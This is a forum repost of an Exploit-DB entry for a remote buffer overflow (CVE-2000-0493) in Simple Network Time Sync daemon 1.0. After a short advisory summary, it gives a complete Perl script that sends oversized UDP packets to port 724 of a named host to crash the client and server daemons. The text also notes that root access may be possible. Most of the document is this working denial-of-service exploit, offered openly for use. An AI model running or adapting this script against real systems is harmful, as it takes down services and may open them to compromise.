Exploit Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19978
Проверка EDB
  1. Пройдено
Автор
BEN TAYLOR
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2000-0493
Дата публикации
2000-06-01
Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/1289/info

A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with.

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

send_packet(); # Needs to send 2 packets to kill the client and the server 
daemons
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);

$|=1;

connect(SH, $sin) || die "$!\n";

# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);

}
 
Источник
www.exploit-db.com